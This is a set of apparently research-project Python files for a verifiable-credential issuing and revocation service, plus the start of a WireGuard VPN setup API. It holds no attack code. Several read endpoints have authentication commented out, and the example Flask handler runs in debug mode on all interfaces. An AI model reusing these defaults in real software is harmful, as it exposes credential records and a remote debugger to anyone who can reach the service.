mongo_setup_admin.stakeholder_col.find_one_and_update({"stakeholderClaim.stakeholderDID": decoded["stakeholderDID"]}, {'$set': {"verified": True}})
ending = {
"stakeholderDID": decoded["stakeholderDID"],
"verified": True
}
return ending
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to perform validation")
```
#### File: bootstrap/key/issuer_key.py
```python
import requests, json, time, sys, os
from timeloop import Timeloop
from datetime import timedelta
def general_message(status, message, code):
response = {"status": status, "message": message, "code": code}
return json.dumps(response, indent = 4)
#tl = Timeloop()
<EMAIL>(interval=timedelta(seconds=86400))
def issuer_key_create():
try:
print("\n")
print("####################################################")
print("#################### ISSUER KEY ####################")
print("####################################################")
holder_url = os.environ["ISSUER_AGENT_URL"]
resp = requests.post(holder_url+"/wallet/did/create", timeout=30)
result = resp.json()
#did = result["result"]["did"]
global verkey
verkey = result["result"]["verkey"]
print("Verification Key: " + str(verkey))
print("#################### ISSUER KEY - END ####################")
print("\n")
except:
print(general_message("error", "Unable to create bootstrap verification key.", 400))
sys.exit()
#tl.start(block=False)
```
#### File: app/bootstrap/setup_verifier.py
```python
import requests, json, time, sys, os
def general_message(status, message, code):
response = {"status": status, "message": message, "code": code}
return json.dumps(response, indent = 4)
header = {
'Content-Type': 'application/json'
}
def verifier_connection():
print("\n")
print("#############################################################")
print("#################### VERIFIER CONNECTION ####################")
print("#############################################################")
#connection_id = "teste_2"
global connection_id
try:
URL = os.environ["VERIFIER_AGENT_URL"]
resp = requests.post(URL+"/connections/create-invitation", headers=header, timeout=30)
body = resp.json()
connection_id = body["connection_id"]
conn_invite = json.dumps(body["invitation"], indent = 4)
print(connection_id)
print(conn_invite)
except:
print(general_message("error", "Unable to post Invitation.", 400))
sys.exit()
try:
URL_holder = os.environ["HOLDER_AGENT_URL"]
resp_accept = requests.post(URL_holder+"/connections/receive-invitation", data=conn_invite, headers=header, timeout=30)
body_accept = resp_accept.json()
print(body_accept)
except:
print(general_message("error", "Unable to accept Invitation.", 400))
sys.exit()
time.sleep(10)
try:
resp_confirm_active = requests.get(URL+"/connections/"+connection_id, timeout=30)
body_active = resp_confirm_active.json()
if body_active["state"] == 'active':
#log_message(200, "Issuer Connection established successfully.")
print(general_message("success", "Verifier Connection established successfully.", 200))
except:
print(general_message("error", "Unable to establish Verifier Connection.", 400))
sys.exit()
print("#################### VERIFIER CONNECTION - END ####################")
print("\n")
```
#### File: app/holder/holder_did.py
```python
from fastapi import APIRouter, Response, status
from fastapi.responses import JSONResponse
import requests, json, sys, os, time, threading, copy
from loguru import logger
from bson import ObjectId
#from app.authentication import authentication
from app.db import mongo_setup_provider
from app.holder import utils
# classes
from app.holder.classes import Offer, ReadOfferDID, State
router = APIRouter(
prefix="/holder",
tags=["holder"]
)
@router.post("/create_did", status_code=201)
async def request_credential(response: Response, body: Offer):
# AUTH
try:
body_dict = body.dict()
subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": body_dict["token"]})
if subscriber is not None:
if body_dict["token"] != subscriber["id_token"]:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
else:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to verify ID Token")
# PRIVATE DID
try:
holder_url = os.environ["HOLDER_AGENT_URL"]
resp = requests.post(holder_url+"/wallet/did/create", timeout=30)
result = resp.json()
did = result["result"]["did"]
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to create wallet DID")
# STORE REQUEST ON MONGO
try:
epoch_ts = str(int(time.time()))
# MONGO WILL ADD _id TO THIS DICT
res_to_mongo = {
"type": body_dict["type"],
"credentialSubject": {
"id": did,
"claims": body_dict["claims"]
},
"timestamp": epoch_ts,
"state": State.did_offer_request,
"handler_url": body_dict["handler_url"]
}
client_res = copy.deepcopy(res_to_mongo)
mongo_setup_provider.collection.insert_one(res_to_mongo)
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to store Credential request on Database")
# SEND TO ADMIN
try:
res_to_admin = {
"type": body_dict["type"],
"credentialSubject": {
"id": did,
"claims": body_dict["claims"]
},
"timestamp": epoch_ts,
"service_endpoint": os.environ["TRADING_PROVIDER_AGENT_CONTROLLER_URL"],
"agent_service_endpoint": holder_url
#"handler_url": handler_url
}
#print(res_to_admin)
URL = os.environ["ADMIN_AGENT_CONTROLLER_URL"]
requests.post(URL+"/issuer/request_credential_issue/"+str(res_to_mongo["_id"]), json=res_to_admin, timeout=60)
# SEND TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(body_dict["handler_url"],client_res,), daemon=True)
thread.start()
return client_res
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to perform Credential issuing request")
@router.post("/decline_offer_did/{request_id}", include_in_schema=False)
async def decline_offer_did(request_id: str, response: Response):
#UPDATE MONGO RECORD
try:
mongo_setup_provider.collection.find_one_and_update({'_id': ObjectId(request_id)}, {'$set': {"state": State.did_offer_decline}}) # UPDATE REQUEST RECORD FROM MONGO
subscriber = mongo_setup_provider.collection.find_one({"_id": ObjectId(request_id)}, {"_id": 0})
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update Mongo record")
# SEND REQUEST RECORD TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(subscriber["handler_url"],subscriber,), daemon=True)
thread.start()
@router.post("/update_did_state/{request_id}", include_in_schema=False)
async def update_did_state(request_id: str, body: dict, response: Response):
#UPDATE MONGO RECORD
try:
#print(body)
mongo_setup_provider.collection.find_one_and_update({'_id': ObjectId(request_id)}, {'$set': {"state": State.did_offer_issue, "credential_definition_id": body["credential_definition_id"], "credential_exchange_id": body["credential_exchange_id"]}}) # UPDATE REQUEST RECORD FROM MONGO
subscriber = mongo_setup_provider.collection.find_one({"_id": ObjectId(request_id)})
#print(subscriber["handler_url"])
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update Mongo record")
# SEND REQUEST RECORD TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(subscriber["handler_url"],body,), daemon=True)
thread.start()
@router.post("/update_revoked_state/{credential_exchange_id}", include_in_schema=False)
async def update_revoked_state(credential_exchange_id: str, body: dict, response: Response):
#UPDATE MONGO RECORD
try:
#print(body)
mongo_setup_provider.collection.find_one_and_update({'credential_exchange_id': credential_exchange_id}, {'$set': {"revoked": True}}) # UPDATE REQUEST RECORD FROM MONGO
subscriber = mongo_setup_provider.collection.find_one({"credential_exchange_id": credential_exchange_id})
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update Mongo record")
# SEND REQUEST RECORD TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(subscriber["handler_url"],body,), daemon=True)
thread.start()
@router.post("/read_did_status")
async def read_credential_status(response: Response, body: ReadOfferDID):
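    # Illustrative request body (assumed values; fields follow the ReadOfferDID model used below):
    # {"token": "<stakeholder-id-token>", "did_identifier": "did:5gzorro:dummy12345"}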
#if token != id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
body_dict = body.dict()
subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": body_dict["token"]})
if subscriber is not None:
if body_dict["token"] != subscriber["id_token"]:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
else:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to verify ID Token")
try:
subscriber = mongo_setup_provider.collection.find_one({"credentialSubject.id": body_dict["did_identifier"]}, {"_id": 0})
if subscriber == None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="DID Credential non existent")
else:
return subscriber
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch requested DID")
@router.get("/read_did")
async def read_specific_credential(response: Response, did_identifier: str): #, token: str, handler_url: Optional[str] = None
#if token != id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#try:
# subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": token})
# if token != subscriber["id_token"]:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#except:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
subscriber = mongo_setup_provider.collection.find_one({"credentialSubject.id": did_identifier, "state": State.did_offer_issue, "revoked" : {"$exists" : False}}, {"_id": 0, "state": 0, "handler_url": 0, "credential_exchange_id": 0})
if subscriber == None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Marketplace Credential not issued or non existent")
else:
return subscriber
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch specific Marketplace Credential")
@router.get("/read_did_catalog")
async def read_all_credentials(response: Response): #, token: str, handler_url: Optional[str] = None
#if token != id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#try:
# subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": token})
# if token != subscriber["id_token"]:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#except:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
subscriber = mongo_setup_provider.collection.find({"state": State.did_offer_issue, "revoked" : { "$exists" : False}}, {"_id": 0, "state": 0, "handler_url": 0, "credential_exchange_id": 0})
result_list = []
for result_object in subscriber:
#print(result_object)
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch Marketplace Credentials")
@router.get("/read_did/revoked")
async def read_revoked_credential():
try:
subscriber = mongo_setup_provider.collection.find({"revoked" : { "$exists" : True}}, {"_id": 0, "state": 0, "handler_url": 0, "credential_exchange_id": 0, "revoked": 0})
result_list = []
for result_object in subscriber:
#print(result_object)
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch revoked Marketplace Credentials")
```
#### File: app/issuer/issuer_did.py
```python
from typing import Optional
from fastapi import APIRouter, Response, status
from fastapi.responses import JSONResponse
import requests, json, os
from loguru import logger
from bson import ObjectId
from app.db import mongo_setup_admin
from app.bootstrap import setup_issuer, setup_vc_schema
#from app.authentication import authentication
# classes
from app.issuer.classes import ReqCred, IssueCred, RevokeCred, State, ResolveOffer
router = APIRouter(
prefix="/issuer",
tags=["issuer"]
)
header = {
'Content-Type': 'application/json'
}
@router.get("/did_offer/pending")
async def read_pending_did_offer_approval(response: Response):
try:
result_list = []
subscriber = mongo_setup_admin.collection.find({"state" : State.did_offer_request, "revoked" : { "$exists" : False}}, {"_id": 0, "service_endpoint": 0})
for result_object in subscriber:
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to read pending DID Offers for approval")
@router.put("/did_offer/resolve", status_code=200)
async def resolve_pending_did_offer_approval(response: Response, body: ResolveOffer):
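    # Illustrative request body (assumed values; fields follow the ResolveOffer model used below):
    # {"id": "did:5gzorro:dummy12345", "approval": true}
    # approval=false rejects the pending offer instead of issuing it.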
# Check if pending offer exists
try:
body_dict = body.dict()
subscriber = mongo_setup_admin.collection.find_one({"credentialSubject.id": body_dict["id"], "state" : State.did_offer_request, "revoked" : { "$exists" : False}}, {"_id": 0})
if subscriber is None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Pending Credential Offer not found, or was resolved, or doesn't exist")
except Exception as error:
logger.error(error)
        return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to verify existence of pending Credential Offer")
# Resolve credential offer
try:
if body_dict["approval"] is False:
# Reject Credential Offer
mongo_setup_admin.collection.find_one_and_update({"credentialSubject.id": body_dict["id"]}, {'$set': {"state": State.did_offer_decline}}) # UPDATE REQUEST RECORD FROM MONGO
requests.post(subscriber["service_endpoint"]+"/holder/decline_offer_did/"+str(subscriber["holder_request_id"]), timeout=30)
return "Credential Offer was rejected"
else:
# Issue Credential Offer
try:
URL = os.environ["ISSUER_AGENT_URL"]
# Configure Credential to be published
issue_cred = {
"connection_id": subscriber["connection_id"],
"cred_def_id": subscriber["credential_definition_id"],
"credential_proposal": {
"attributes": [
{
"name": "type",
"value": subscriber["type"]
},
{
"name": "credentialSubject",
"value": str(subscriber["credentialSubject"])
},
{
"name": "timestamp",
"value": str(subscriber["timestamp"])
}
]
}
}
final_resp = requests.post(URL+"/issue-credential/send", data=json.dumps(issue_cred), headers=header, timeout=60)
#print(final_resp.text)
cred_info = json.loads(final_resp.text)
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to issue credential on agent")
if cred_info["state"] == "offer_sent":
# SUBSCRIBE TO AGENT RESPONSE
try:
# UPDATE REQUEST RECORD FROM MONGO
mongo_setup_admin.collection.find_one_and_update({"credentialSubject.id": body_dict["id"]}, {'$set': {"state": State.did_offer_issue, "credential_exchange_id": cred_info["credential_exchange_id"]}})
#mongo_setup.collection.remove({"_id": ObjectId(request_id)})
resp_cred = {
"credential_exchange_id": cred_info["credential_exchange_id"],
"credential_definition_id": cred_info["credential_definition_id"],
"credential_offer_dict": cred_info["credential_offer_dict"],
"created_at": cred_info["created_at"],
"updated_at": cred_info["updated_at"],
"schema_id": cred_info["schema_id"],
"state": "credential_acked"
}
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update and subscribe to response")
# NOTIFY HOLDER AGENT
requests.post(subscriber["service_endpoint"]+"/holder/update_did_state/"+str(subscriber["holder_request_id"]), json=resp_cred, timeout=60)
return resp_cred
else:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to subscribe to Credential response")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to connect to Issuer Agent")
@router.post("/request_credential_issue/{request_id}", status_code=201, include_in_schema=False)
async def request_credential_issue(request_id: str, response: Response, body: ReqCred):
# SETUP ISSUER CONNECTION
try:
body_dict = body.dict()
setup_issuer.issuer_connection(body_dict["agent_service_endpoint"])
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to establish Issuer Connection")
# SETUP VC SCHEMA
try:
setup_vc_schema.vc_setup()
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to setup Verifiable Credential Schema")
# CHECK FOR REQUEST RECORD
test = mongo_setup_admin.collection.find_one({"holder_request_id": request_id})
if test != None:
if test["state"] == State.did_offer_issue:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Credential Request was already issued")
# SUBMIT REQUEST TO ADMIN HANDLER
try:
res_to_insert_db = {
"holder_request_id": request_id,
"type": body_dict["type"],
"credentialSubject": {
"id": body_dict["credentialSubject"]["id"],
"claims": body_dict["credentialSubject"]["claims"]
},
"timestamp": body_dict["timestamp"],
"state": State.did_offer_request,
#"handler_url": body_dict["handler_url"]
"service_endpoint": body_dict["service_endpoint"],
"connection_id": setup_issuer.connection_id,
"credential_definition_id": setup_vc_schema.cred_def_id
}
mongo_setup_admin.collection.insert_one(res_to_insert_db)
'''
res_to_admin_handler = {
"_id": str(res_to_insert_db["_id"]),
"holder_request_id": request_id,
"type": body_dict["type"],
"credentialSubject": {
"id": body_dict["credentialSubject"]["id"],
"claims": body_dict["credentialSubject"]["claims"]
},
"timestamp": body_dict["timestamp"],
"service_endpoint": body_dict["service_endpoint"]
}
#print(res_to_admin_handler)
admin_handler_url = os.environ["HANDLER_ADMIN_URL"]
requests.post(admin_handler_url+"/receive", headers=header, json=res_to_admin_handler, timeout=60)
#print(res.json())
return res_to_admin_handler
'''
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to connect to Admin Handler")
'''
@router.post("/issue_requested_credential/{request_id}", status_code=201)
async def issue_requested_credential(request_id: str, response: Response, body: IssueCred): #token: str,
#if token != authentication.id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
# CHECK FOR REQUEST RECORD
try:
test = mongo_setup_admin.collection.find_one({"_id": ObjectId(request_id)})
#print(test)
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Credential Request doesn't exist in Database")
# ISSUE CREDENTIAL
try:
body_dict = body.dict()
URL = os.environ["ISSUER_AGENT_URL"]
# Configure Credential to be published
issue_cred = {
"connection_id": setup_issuer.connection_id,
"cred_def_id": setup_vc_schema.cred_def_id,
"credential_proposal": {
"attributes": [
{
"name": "type",
"value": body_dict["type"]
},
{
"name": "credentialSubject",
"value": str(body_dict["credentialSubject"])
},
{
"name": "timestamp",
"value": str(body_dict["timestamp"])
}
]
}
}
final_resp = requests.post(URL+"/issue-credential/send", data=json.dumps(issue_cred), headers=header, timeout=60)
#print(final_resp.text)
cred_info = json.loads(final_resp.text)
if cred_info["state"] == "offer_sent":
# SUBSCRIBE TO AGENT RESPONSE
try:
# UPDATE REQUEST RECORD FROM MONGO
mongo_setup_admin.collection.find_one_and_update({'_id': ObjectId(request_id)}, {'$set': {"state": "Credential Issued", "credential_definition_id": cred_info["credential_definition_id"], "credential_exchange_id": cred_info["credential_exchange_id"]}})
#mongo_setup.collection.remove({"_id": ObjectId(request_id)})
resp_cred = {
"credential_exchange_id": cred_info["credential_exchange_id"],
"credential_definition_id": cred_info["credential_definition_id"],
"credential_offer_dict": cred_info["credential_offer_dict"],
"created_at": cred_info["created_at"],
"updated_at": cred_info["updated_at"],
"schema_id": cred_info["schema_id"],
"state": "credential_acked"
}
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update and subscribe to response")
# NOTIFY HOLDER AGENT
#try:
holder_url = body_dict["service_endpoint"]
#print(holder_url)
requests.post(holder_url+"/holder/update_did_state/"+str(body_dict["holder_request_id"]), json=resp_cred, timeout=60)
#except:
# return "Unable to notify Holder"
return resp_cred
else:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to subscribe to Credential response")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to connect to Issuer Agent")
'''
@router.get("/read_issued_did")
async def read_issued_did(response: Response, did_identifier: str): #token: str,
#if token != authentication.id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
#URL = os.environ["HOLDER_AGENT_URL"]
#resp = requests.get(URL+"/credential/"+cred_id, timeout=30)
#body = resp.json()
#return body
subscriber = mongo_setup_admin.collection.find_one({"credentialSubject.id": did_identifier, "state": State.did_offer_issue, "revoked" : {"$exists" : False}}, {"_id": 0, "holder_request_id":0, "state": 0, "service_endpoint": 0})
if subscriber == None:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Marketplace Credential revoked or not issued")
else:
return subscriber
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch specific issued Marketplace Credential")
@router.get("/read_issued_did/all")
async def read_all_issued_did(response: Response): #, token: str
#if token != authentication.id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
#URL = os.environ["HOLDER_AGENT_URL"]
#resp = requests.get(URL+"/credentials", timeout=30)
#body = resp.json()
#return body
subscriber = mongo_setup_admin.collection.find({"state": State.did_offer_issue, "revoked" : {"$exists" : False}}, {"_id": 0, "holder_request_id":0, "state": 0, "service_endpoint": 0})
result_list = []
for result_object in subscriber:
#print(result_object)
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch issued Marketplace Credentials")
@router.put("/revoke_did")
async def revoke_credential(response: Response, body: RevokeCred):
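    # Illustrative request body (assumed values; field follows the RevokeCred model used below):
    # {"cred_exchange_id": "<credential-exchange-id>"}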
# CHECK FOR REQUEST RECORD
try:
body_dict = body.dict()
subscriber = mongo_setup_admin.collection.find_one({"credential_exchange_id": body_dict["cred_exchange_id"]}, {"_id":0})
#return subscriber
if subscriber == None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Credential doesn't exist in Database or hasn't been issued yet")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to find Credential to revoke")
# CHECK IF CRED IS ALREADY REVOKED
try:
if "revoked" in subscriber:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Credential already revoked")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to check if Credential is revoked")
# REVOKE CREDENTIAL
try:
# Configure Credential to be published
revoke_cred = {
"cred_ex_id": subscriber["credential_exchange_id"],
"publish": True
}
URL = os.environ["ISSUER_AGENT_URL"]
final_resp = requests.post(URL+"/revocation/revoke", data=json.dumps(revoke_cred), headers=header, timeout=60)
#revoke_info = json.loads(final_resp.text)
#return revoke_info
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to revoke Credential")
# UPDATE CRED INFO
try:
mongo_setup_admin.collection.find_one_and_update({"credential_exchange_id": subscriber["credential_exchange_id"]}, {'$set': {"revoked": True}})
resp_revoke = {
"credential_exchange_id": subscriber["credential_exchange_id"],
"revoked": True
}
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update and subscribe to response")
# NOTIFY HOLDER AGENT
holder_url = subscriber["service_endpoint"]
#print(holder_url)
requests.post(holder_url+"/holder/update_revoked_state/"+str(subscriber["credential_exchange_id"]), json=resp_revoke, timeout=60)
return resp_revoke
@router.get("/read_did/revoked")
async def read_revoked_credential():
try:
subscriber = mongo_setup_admin.collection.find({"revoked" : { "$exists" : True}}, {"_id": 0, "holder_request_id":0, "state": 0, "service_endpoint": 0, "revoked": 0})
result_list = []
for result_object in subscriber:
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch revoked Marketplace Credentials")
```
#### File: src/handler_example/handler.py
```python
import requests, json, os
from flask import Flask, request, jsonify
#from dotenv import load_dotenv
#load_dotenv()
app = Flask(__name__)
admin_controller_url = os.environ["ADMIN_CONTROLLER_URL_DEV"]
########## CREDENTIAL ISSUING ###########
@app.route('/receive', methods=['POST'])
def handler_receiver():
global value
value = request.json
print(value)
return value
@app.route('/accept', methods=['GET'])
def handler_sender():
res_to_admin_agent = {
"holder_request_id": value["holder_request_id"],
"type": value["type"],
"credentialSubject": {
"id": value["credentialSubject"]["id"],
"claims": value["credentialSubject"]["claims"]
},
"timestamp": value["timestamp"],
"service_endpoint": value["service_endpoint"]
}
#print(value["holder_request_id"])
print(res_to_admin_agent)
resp = requests.post(admin_controller_url+"/issuer/issue_requested_credential/"+value["_id"], json=res_to_admin_agent, timeout=60) #+"?token=<PASSWORD>"
body = resp.json()
return body
########## STAKEHOLDER REGISTRATION ###########
@app.route('/stakeholder/receive', methods=['POST'])
def handler_stakeholder_receiver():
global stake_value
stake_value = request.json
print(stake_value)
return stake_value
@app.route('/stakeholder/accept', methods=['GET'])
def handler_stakeholder_sender():
res_stake_admin_agent = {
"holder_request_id": stake_value["holder_request_id"],
"stakeholderClaim": {
"governanceBoardDID": stake_value["stakeholderClaim"]["governanceBoardDID"],
"stakeholderServices": stake_value["stakeholderClaim"]["stakeholderServices"],
#"stakeholderRoles": {
# "role": stake_value["stakeholderClaim"]["stakeholderRoles"]["role"],
# "assets": stake_value["stakeholderClaim"]["stakeholderRoles"]["assets"]
#},
"stakeholderRoles": stake_value["stakeholderClaim"]["stakeholderRoles"],
"stakeholderProfile": {
"name": stake_value["stakeholderClaim"]["stakeholderProfile"]["name"],
"ledgerIdentity": stake_value["stakeholderClaim"]["stakeholderProfile"]["ledgerIdentity"],
"address": stake_value["stakeholderClaim"]["stakeholderProfile"]["address"],
"notificationMethod": stake_value["stakeholderClaim"]["stakeholderProfile"]["notificationMethod"]
},
"stakeholderDID": stake_value["stakeholderClaim"]["stakeholderDID"]
#"did": stake_value["stakeholderClaim"]["did"],
#"verkey": stake_value["stakeholderClaim"]["verkey"]
},
"timestamp": stake_value["timestamp"],
"service_endpoint": stake_value["service_endpoint"]
}
#print(stake_value["holder_request_id"])
print(res_stake_admin_agent)
resp = requests.post(admin_controller_url+"/issuer/issue_stakeholder/"+stake_value["_id"], json=res_stake_admin_agent, timeout=60)
body = resp.json()
return body
#--------------------------------------------------------------------------------------#
if __name__ == "__main__":
    app.run(port=4800, host='0.0.0.0', debug=True)
``` |
{
"source": "5GZORRO/inter-secure-channel-setup",
"score": 2
} |
#### File: 5GZORRO/inter-secure-channel-setup/app_api.py
```python
from flask import Flask, request
from flask_restful import Resource, Api
from gevent.pywsgi import WSGIServer
from ipaddress import IPv4Network
import os
import json
import requests
import sys
import subprocess
from gevent import monkey
from dotenv import load_dotenv
monkey.patch_all()
app = Flask(__name__)
api = Api(app)
# Get own public key curve25519
def get_public_key():
file = open("public_key", mode="r")
public_key = file.read()
public_key = public_key[:-1]
file.close()
return public_key
def get_public_key_from_IdM():
#This method will be agnostic to the domains after changing the current end-point of the IdM
public_key = requests.get("http://172.28.3.153:6800/authentication/public_key")
return public_key
def get_own_IP():
command = "ip addr show ens3 | grep \"inet \" | awk \'{print $2}\' | cut -f1 -d\"/\""
result = subprocess.run(command, stdout=subprocess.PIPE, shell=True)
ip = result.stdout.decode('utf-8')
return ip
# Get own private key curve25519
def get_private_key():
file = open("private_key", mode="r")
private_key = file.read()
private_key = private_key[:-1]
file.close()
return private_key
def get_vpn_port():
file = open("vpn_port", mode="r")
vpn_port = int(file.read())
file.close()
return vpn_port
def set_vpn_port(n_port):
file = open("vpn_port", mode="w")
file.write(n_port)
file.close()
# When acting as server, get next IP available for clients in wg0.conf
"""def get_next_IP_available():
min1 = 0
min2 = 0
min3 = 0
min4 = 1
file = open("ip_management", "r")
for line in file:
b = line.split(".")
b1 = int(b[0])
b2 = int(b[1])
b3 = int(b[2])
b4 = int(b[3])
if b1 > min1:
min1 = b1
min2 = 0
min3 = 0
min4 = 1
if b2 > min2:
min2 = b2
min3 = 0
min4 = 1
if b3 > min3:
min3 = b3
min4 = 1
if b4 > min4:
min4 = b4
file.close()
# Case of last IP in range (.255), new subrange. Else, assigned ip is last IP + 1
if min4 == 255:
min3 = min3+1
min4 = 1
else:
min4 = min4+1
ip = str(min1)+"."+str(min2)+"."+str(min3)+"."+str(min4)
# Save assigned IP as in usage
file = open("ip_management", "a")
file.write(ip+"\n")
file.close()
return ip"""
def get_next_IP_available_2():
ip_range = '0.0.0.0/0'
with open("/etc/wireguard/wg0.conf", "r") as confi:
for line in confi:
if "Address =" in line:
ip_range = line.split("= ")[1]
ip_range = ip_range.rstrip()
if ip_range.split("/")[1] == "24":
ip = ip_range.split(".")
ip_range = ip[0]+"."+ip[1]+"."+ip[2]+".0/24"
elif ip_range.split("/")[1] == "16":
ip = ip_range.split(".")
ip_range = ip[0]+"."+ip[1]+".0.0/16"
elif ip_range.split("/")[1] == "8":
ip = ip_range.split(".")
ip_range = ip[0]+"."+"0.0.0/8"
network = IPv4Network(ip_range)
IP_reserved = []
file = open("ip_management", "r")
for line in file:
IP_reserved.append(line.rstrip())
file.close()
first_IP_available = (host for host in network.hosts() if str(host) not in IP_reserved)
assigned_ip = next(first_IP_available)
# Save assigned IP as in usage
file = open("ip_management", "a")
file.write(str(assigned_ip)+"\n")
file.close()
return str(assigned_ip)
def liberate_free_ip(ip_vpn):
    file = open("ip_management","r")
    line_ip = 0
    for num, line in enumerate(file, 1):
        if ip_vpn in line:
            line_ip = num
    file.close()
    # sed line numbering is 1-based, matching enumerate(file, 1)
    if line_ip != 0:
        os.system("sudo sed -i '"+str(line_ip)+"d' ip_management")
# Returns the number, in order, of the gateway to be connected.
# n is incremented by one per gateway connected to as a client.
def get_n_gateway():
file = open("n_gateway", mode="r")
n_gateway = int(file.read())
file.close()
return n_gateway
def set_n_gateway(n):
file = open("n_gateway", mode="w")
file.write(str(n))
file.close()
# Stores n_gate with the server ip and port to be consulted when deleting
# the connection.
def store_interface_server_association(n_gate, server_ip, server_port):
file = open("interface_server_associations", mode="a")
file.write(str(n_gate) + ":" + str(server_ip) + ":" + str(server_port) + "\n")
file.close()
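# Each line of interface_server_associations has the form "<n_gate>:<server_ip>:<server_port>",
# e.g. (illustrative, assumed values) "1:203.0.113.10:6000".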
# Get the n_gate associated with the requested ip and port
def get_interface_server_association(server_ip, server_port):
with open("interface_server_associations", mode="r") as file:
for line in file:
parts = line.split(":")
server_port = str(server_port).split()
parts[2] = parts[2].split()
if server_ip == parts[1] and server_port == parts[2]:
return int(parts[0])
return 999999
class launch(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
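        # Illustrative request body (assumed values):
        # {"ip_range": "10.0.0.1/24", "net_interface": "ens3", "port": 51820}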
ip_range = req["ip_range"]
net_interface = req["net_interface"]
port = req["port"]
# Take environment variable
load_dotenv()
